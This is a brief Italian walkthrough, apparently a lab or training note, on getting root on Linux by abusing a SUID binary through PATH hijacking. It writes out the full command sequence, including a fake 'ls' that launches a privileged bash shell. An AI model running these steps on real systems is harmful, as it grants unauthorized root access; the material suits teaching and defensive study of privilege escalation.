
Obiettivo: Sfruttare un binario SUID per ottenere root su una macchina Linux.
Procedura:
Trovare binari SUID vulnerabili:
find / -perm -4000 2>/dev/null
Analizzare
env
per path hijacking:strings /usr/bin/custom-suid-binary
Creare un payload malevolo:
echo "/bin/bash -p" > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
- Eseguire il binario SUID per ottenere root:
/usr/bin/custom-suid-binary
Rubrica